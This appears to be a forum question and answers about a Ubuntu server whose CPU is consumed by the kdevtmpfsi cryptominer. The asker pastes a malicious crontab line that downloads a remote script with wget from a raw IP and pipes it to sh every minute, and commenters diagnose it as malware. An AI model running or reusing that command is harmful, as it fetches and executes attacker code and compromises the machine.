# kdevtmpfsi using the entire CPU

Tags: cron, malware

I noticed the cpu on ubuntu is 100% used by a process named `kdevtmpfsi`

Anyone know what this is -is it malware?

In `/var/spool/cron/crontabs/www-data` i came across the following cron job:

```
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Wed Feb  1 05:30:10 2023)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
```

Is this legitimate or again malware?

Comment: yes that looks bad. the IP address is Russia, Moscow. and it is executing a script. I suggest download the script manually and look at what it is doing. Also check all of your logs in `/var/log` for how this happened at 2023.02.01 05:30:10.

Comment: @DougSmythies which log file would i be looking at? Sorry I'm still a newbie on server management.

Comment: All of them. also look [here](https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu). You seems to have a crypto mining malware.

Comment: this cron script definitely isn't part of the operating system. Good job spotting it. No serious package would use a script like this. It says every 1 minute, download this file and run it.